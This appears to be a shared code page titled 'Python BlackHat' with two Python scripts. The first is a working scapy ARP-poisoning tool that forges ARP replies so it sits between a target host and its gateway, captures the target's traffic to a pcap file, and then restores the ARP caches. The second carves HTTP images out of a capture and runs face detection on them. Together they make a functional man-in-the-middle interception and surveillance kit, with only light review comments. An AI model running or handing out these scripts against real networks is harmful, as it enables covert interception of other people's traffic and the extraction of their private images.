Created
September 22, 2017 19:36
Python BlackHat
# -*- coding: utf-8 -*- | |
from scapy.all import * | |
import os | |
import sys | |
import threading | |
import signal | |
# Before running, enable IP forwarding. macOS: sudo sysctl -w net.inet.ip.forwarding=1
# Linux: echo 1 > /proc/sys/net/ipv4/ip_forward
def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-announce the genuine IP-to-MAC bindings, then interrupt this process.

    Five ARP replies (op=2) are broadcast for each direction, carrying the
    real hardware address of the gateway and of the target, so that both
    hosts overwrite the cache entries changed by ``poison_target``. The
    function then sends SIGINT to the current PID.
    """
    broadcast_mac = "ff:ff:ff:ff:ff:ff"
    print("[*] Restoring target... ")

    # The two send() calls differ only in whose true binding is announced.
    true_gateway = ARP(op=2, psrc=gateway_ip, pdst=target_ip,
                       hwdst=broadcast_mac, hwsrc=gateway_mac)
    send(true_gateway, count=5)

    true_target = ARP(op=2, psrc=target_ip, pdst=gateway_ip,
                      hwdst=broadcast_mac, hwsrc=target_mac)
    send(true_target, count=5)

    # Send the exit signal to the main thread.
    os.kill(os.getpid(), signal.SIGINT)
def get_mac(ip_address):
    """Resolve *ip_address* to a MAC address with a broadcast ARP request.

    Returns the Ethernet source address of the first answer, or None when
    nothing answered within the timeout/retry budget given to ``srp``.
    """
    arp_query = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)

    # srp() hands back (answered, unanswered), e.g.
    # (<Results: TCP:0 UDP:0 ICMP:1 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>)
    answered, _unanswered = srp(arp_query, timeout=2, retry=10)

    # Each answered entry is a (sent, received) pair; the first reply wins.
    for _sent, reply in answered:
        return reply[Ether].src
    return None
def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Send one ARP reply to the target and one to the gateway every 2 seconds.

    The reply to the target carries the gateway's IP as sender, and the reply
    to the gateway carries the target's IP as sender. On KeyboardInterrupt the
    real bindings are re-announced through ``restore_target``.

    On the wire this is a steady stream of unsolicited op=2 ARP replies for
    the same two IP addresses, which is the pattern ARP-cache monitoring and
    switch-side ARP inspection look for.
    """
    # hwsrc is left unset on both replies; per the original author's note it
    # then defaults to this machine's own address.
    reply_to_target = ARP(op=2, psrc=gateway_ip, pdst=target_ip, hwdst=target_mac)
    reply_to_gateway = ARP(op=2, psrc=target_ip, pdst=gateway_ip, hwdst=gateway_mac)

    print("[*] Beginning the ARP Poison. [CTRL-C to stop]")

    # NOTE(review): `time` is not imported by name in this file; presumably it
    # arrives through `from scapy.all import *` - confirm.
    while True:
        try:
            for forged_reply in (reply_to_target, reply_to_gateway):
                send(forged_reply)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            # NOTE(review): the listing lost its indentation; the print/return
            # are placed in the handler, the only position where they are reachable.
            print("[*] ARP Poison attack finished")
            return
# Run parameters: capture interface, the two hosts involved, and how many
# packets to record before stopping.
interface = "eth0"
target_ip = "192.168.1.7"
gateway_ip = "192.168.1.1"
packet_count = 1000

# Select the interface scapy uses for sniffing.
conf.iface = interface

# Turn off scapy's own output.
conf.verb = 0

print("[*] Setting up %s" % interface)

# Both hardware addresses must resolve before anything else is sent.
gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting")
    sys.exit(0)
print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)
if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting")
    sys.exit(0)
print("[*] Target %s is at %s" % (target_ip, target_mac))

# Start the ARP poisoning thread.
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac),
)
poison_thread.start()

try:
    print("[*] Starting sniffer for %d packets" % packet_count)

    # BPF filter: only IP traffic to or from the target host.
    bpf_sniffer = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_sniffer, iface=interface)

    # Write the captured packets to a file; it holds full packet payloads.
    wrpcap('arper.pcap', packets)

    # Put the network's ARP state back.
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

except KeyboardInterrupt:
    # Put the network's ARP state back.
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)
# -*- coding: utf-8 -*- | |
import re | |
import zlib | |
import cv2 | |
from scapy.all import * | |
# Directory that receives every image carved out of the capture.
picture_directory = "./pictures"

# Directory that receives annotated copies of images in which a face was found.
faces_directory = "./faces"

# Capture file analysed when the module is run as a script.
pcap_file = "bhp.pcap"
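def get_http_headers(http_payload):
    """Parse the first HTTP header block of a reassembled stream into a dict.

    Args:
        http_payload: Concatenated TCP payload text of one session.

    Returns:
        A dict mapping header names to values, with names kept exactly as
        captured, or None when the payload has no blank-line header
        terminator, is not text, or carries no ``Content-Type`` header.

    Header names and values come straight from captured traffic, so callers
    must treat them as untrusted input.
    """
    try:
        # If this is HTTP traffic, cut out the header block. One trailing CRLF
        # is kept so that the last header line still matches the pattern.
        header_end = http_payload.index("\r\n\r\n") + 2
        headers_raw = http_payload[:header_end]

        # Split into name/value pairs, e.g. "Content-Type: image/pgf\r\n"
        # becomes {'Content-Type': 'image/pgf'}.
        headers = dict(re.findall(r"(?P<name>.*?): (?P<value>.*?)\r\n", headers_raw))
    except (ValueError, TypeError, AttributeError):
        # Previously a bare ``except:``, which also swallowed
        # KeyboardInterrupt and SystemExit while a large capture was parsed.
        return None

    if "Content-Type" not in headers:
        # NOTE(review): this match is case-sensitive, so a peer that sends
        # "content-type" is skipped.
        return None

    return headers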
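def _inflate_bounded(data, wbits, limit):
    """Inflate *data*, raising ValueError if the output would exceed *limit* bytes."""
    inflater = zlib.decompressobj(wbits)
    # Ask for one byte more than allowed so that an overrun is detectable.
    inflated = inflater.decompress(data, limit + 1)
    if len(inflated) > limit or inflater.unconsumed_tail:
        raise ValueError("decompressed body exceeds %d bytes" % limit)
    # zlib.decompress() rejects a truncated stream; keep that behaviour where
    # the interpreter exposes the end-of-stream flag.
    if not getattr(inflater, "eof", True):
        raise zlib.error("incomplete or truncated stream")
    return inflated


def extract_image(headers, http_payload, max_image_bytes=50 * 1024 * 1024):
    """Pull an image body and its subtype out of one reassembled HTTP stream.

    Args:
        headers: Header dict as returned by ``get_http_headers``.
        http_payload: The full reassembled payload (headers plus body).
        max_image_bytes: Upper bound on the size of a decompressed body.

    Returns:
        ``(image, image_type)``. Both are None when the content type is not
        an image or the payload cannot be split into headers and body.

    Both arguments originate from captured traffic and are untrusted:

    * The body is inflated with a size cap, because a small gzip/deflate
      body can expand to an arbitrarily large buffer. A body that fails to
      inflate or exceeds the cap is returned as received, matching the
      earlier best-effort behaviour.
    * ``image_type`` is reduced to ``[A-Za-z0-9.+-]`` with any ``;parameter``
      suffix dropped, since callers use it as a file-name extension.
    """
    image = None
    image_type = None

    try:
        content_type = headers['Content-Type']
        if "image" in content_type:
            # Image subtype (the part after "image/") and the raw body.
            subtype = content_type.split("/")[1].split(";")[0]
            image_type = re.sub(r"[^A-Za-z0-9.+-]", "", subtype)

            # Match the separator to the payload type so byte payloads work too.
            terminator = b"\r\n\r\n" if isinstance(http_payload, bytes) else "\r\n\r\n"
            image = http_payload[http_payload.index(terminator) + 4:]

            # Decompress the body when the sender compressed it.
            try:
                encoding = headers.get('Content-Encoding')
                if encoding == 'gzip':
                    image = _inflate_bounded(image, 16 + zlib.MAX_WBITS, max_image_bytes)
                elif encoding == 'deflate':
                    image = _inflate_bounded(image, zlib.MAX_WBITS, max_image_bytes)
            except (zlib.error, ValueError, TypeError):
                # Best effort: keep the body exactly as it was captured.
                pass
    except (KeyError, IndexError, ValueError, TypeError, AttributeError):
        # Narrowed from a bare ``except:`` so Ctrl-C and SystemExit propagate.
        return None, None

    return image, image_type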
def face_detect(path, file_name):
    """Run the frontal-face Haar cascade over the image stored at *path*.

    Returns False when the cascade reports no rectangles. Otherwise every
    rectangle is outlined on the image, the annotated copy is written to
    ``faces_directory`` as ``<pcap_file>-<file_name>``, and True is returned.
    """
    frame = cv2.imread(path)
    classifier = cv2.CascadeClassifier("haarcascade_frontalface_alt.xml")
    hits = classifier.detectMultiScale(frame, 1.3, 4, cv2.cv.CV_HAAR_SCALE_IMAGE, (20, 20))

    if not len(hits):
        return False

    # Add columns 0-1 onto columns 2-3, turning each row into two corner points.
    hits[:, 2:] += hits[:, :2]

    # Highlight every detected face on the image.
    for left, top, right, bottom in hits:
        cv2.rectangle(frame, (left, top), (right, bottom), (127, 255, 0), 2)

    annotated_path = "%s/%s-%s" % (faces_directory, pcap_file, file_name)
    cv2.imwrite(annotated_path, frame)
    return True
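def http_assembler(pcap_file):
    """Carve HTTP-delivered images out of a capture and face-check each one.

    Every session in *pcap_file* is reassembled from its port-80 TCP
    payloads, the first header block is parsed, and an image body (if any) is
    written to ``picture_directory`` before ``face_detect`` runs on it.

    Args:
        pcap_file: Path of the capture to read; also used as the prefix of
            every output file name.

    Returns:
        ``(carved_images, faces_detected)`` as two integer counts.

    The capture is untrusted input: bodies and header values are controlled
    by whoever generated the traffic.
    """
    carved_images = 0
    faces_detected = 0

    capture = rdpcap(pcap_file)
    sessions = capture.sessions()

    for session in sessions:
        http_payload = ""

        # Comparable to "Follow TCP Stream" in Wireshark: join the payloads
        # of this session's port-80 segments.
        for packet in sessions[session]:
            try:
                if packet[TCP].dport == 80 or packet[TCP].sport == 80:
                    # NOTE(review): str() of a payload is the raw bytes only
                    # under Python 2, which this listing targets.
                    http_payload += str(packet[TCP].payload)
            except Exception:
                # Packets without a TCP layer are skipped. Narrowed from a
                # bare ``except:`` so that Ctrl-C still stops a long run.
                continue

        headers = get_http_headers(http_payload)
        if headers is None:
            continue

        image, image_type = extract_image(headers, http_payload)
        if image is None or image_type is None:
            continue

        # Store the image; the context manager closes the handle even when
        # the write fails.
        file_name = "%s-pic_carver_%d.%s" % (pcap_file, carved_images, image_type)
        with open("%s/%s" % (picture_directory, file_name), "wb") as fd:
            fd.write(image)
        carved_images += 1

        # Face detection is best effort: a carved body that is not a
        # decodable image must not abort the whole run.
        try:
            if face_detect("%s/%s" % (picture_directory, file_name), file_name) is True:
                faces_detected += 1
        except Exception:
            pass

    return carved_images, faces_detected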
if __name__ == '__main__':
    # Process the configured capture and report both totals.
    carved_images, faces_detected = http_assembler(pcap_file)
    print("Extracted: %d images" % carved_images)
    print("Detected: %d faces" % faces_detected)